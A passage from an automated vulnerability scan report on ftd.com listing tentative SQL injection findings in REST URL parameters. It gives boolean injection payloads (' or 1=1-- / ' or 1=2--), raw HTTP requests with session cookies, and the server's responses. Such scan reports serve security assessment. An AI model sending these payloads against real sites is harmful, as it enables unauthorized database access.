Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; fsr.a=1304902834223; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123189
Date: Mon, 09 May 2011 01:01:21 GMT
X-Varnish: 869409779
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...

1.19. http://www.ftd.com/empty/index.epl [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /empty/index.epl

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 11276003'%20or%201%3d1--%20 and 11276003'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /empty/index.epl11276003'%20or%201%3d1--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; fsr.a=1304902834223; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 419
Date: Mon, 09 May 2011 01:03:13 GMT
X-Varnish: 1301377694
Age: 15
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 1301377694</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /empty/index.epl11276003'%20or%201%3d2--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; fsr.a=1304902834223; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123189
Date: Mon, 09 May 2011 01:03:14 GMT
X-Varnish: 540321110
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...

1.20. http://www.ftd.com/empty/tealeaf.epl [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /empty/tealeaf.epl

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 17774407'%20or%201%3d1--%20 and 17774407'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /empty17774407'%20or%201%3d1--%20/tealeaf.epl HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
X-TeaLeaf-Page-Objects: 0
Origin: http://www.ftd.com
X-TeaLeaf-Page-Img-Fail: 3
X-TeaLeaf-Page-Render: 9226
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.04.03.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902864856
Content-Length: 1245

<ClientEvent count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID20H0M25S760R0.6967325278092176" TimeDuration="9226" DateSince1970="1304902834986" >
<Info PageLoadMilliSecs="9226" Version="2009.0
...[SNIP]...

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:06:40 GMT
X-Varnish: 750156331
Age: 15
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 750156331</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

POST /empty17774407'%20or%201%3d2--%20/tealeaf.epl HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
X-TeaLeaf-Page-Objects: 0
Origin: http://www.ftd.com
X-TeaLeaf-Page-Img-Fail: 3
X-TeaLeaf-Page-Render: 9226
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.04.03.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902864856
Content-Length: 1245

<ClientEvent count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID20H0M25S760R0.6967325278092176" TimeDuration="9226" DateSince1970="1304902834986" >
<Info PageLoadMilliSecs="9226" Version="2009.0
...[SNIP]...

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123193
Date: Mon, 09 May 2011 01:06:41 GMT
X-Varnish: 540333250
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...

1.21. http://www.ftd.com/empty/tealeaf.epl [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /empty/tealeaf.epl

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 14521499'%20or%201%3d1--%20 and 14521499'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /empty/tealeaf.epl14521499'%20or%201%3d1--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
X-TeaLeaf-Page-Objects: 0
Origin: http://www.ftd.com
X-TeaLeaf-Page-Img-Fail: 3
X-TeaLeaf-Page-Render: 9226
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.04.03.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902864856
Content-Length: 1245

<ClientEvent count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID20H0M25S760R0.6967325278092176" TimeDuration="9226" DateSince1970="1304902834986" >
<Info PageLoadMilliSecs="9226" Version="2009.0
...[SNIP]...

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:08:34 GMT
X-Varnish: 729992096
Age: 15
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 729992096</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

POST /empty/tealeaf.epl14521499'%20or%201%3d2--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
X-TeaLeaf-Page-Objects: 0
Origin: http://www.ftd.com
X-TeaLeaf-Page-Img-Fail: 3
X-TeaLeaf-Page-Render: 9226
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.04.03.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902864856
Content-Length: 1245

<ClientEvent count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID20H0M25S760R0.6967325278092176" TimeDuration="9226" DateSince1970="1304902834986" >
<Info PageLoadMilliSecs="9226" Version="2009.0
...[SNIP]...

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123193
Date: Mon, 09 May 2011 01:08:35 GMT
X-Varnish: 1301398466
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe
...[SNIP]...

1.22. http://www.ftd.com/pics/counter.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /pics/counter.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15813113'%20or%201%3d1--%20 and 15813113'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /pics15813113'%20or%201%3d1--%20/counter.gif?markcode=351 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; fsr.a=1304902828764; c1=%7B%22referrer_before_redirect%22%3A%22%22%2C%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:06:31 GMT
X-Varnish: 869426411
Age: 13
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 869426411</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /pics15813113'%20or%201%3d2--%20/counter.gif?markcode=351 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; fsr.a=1304902828764; c1=%7B%22referrer_before_redirect%22%3A%22%22%2C%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123191
Date: Mon, 09 May 2011 01:06:32 GMT
X-Varnish: 869427079
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...

1.23. http://www.ftd.com/pics/counter.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /pics/counter.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 17406797'%20or%201%3d1--%20 and 17406797'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /pics/counter.gif17406797'%20or%201%3d1--%20?markcode=351 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; fsr.a=1304902828764; c1=%7B%22referrer_before_redirect%22%3A%22%22%2C%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:08:33 GMT
X-Varnish: 729991704
Age: 20
Via: 1.1 varnish
Connection: close


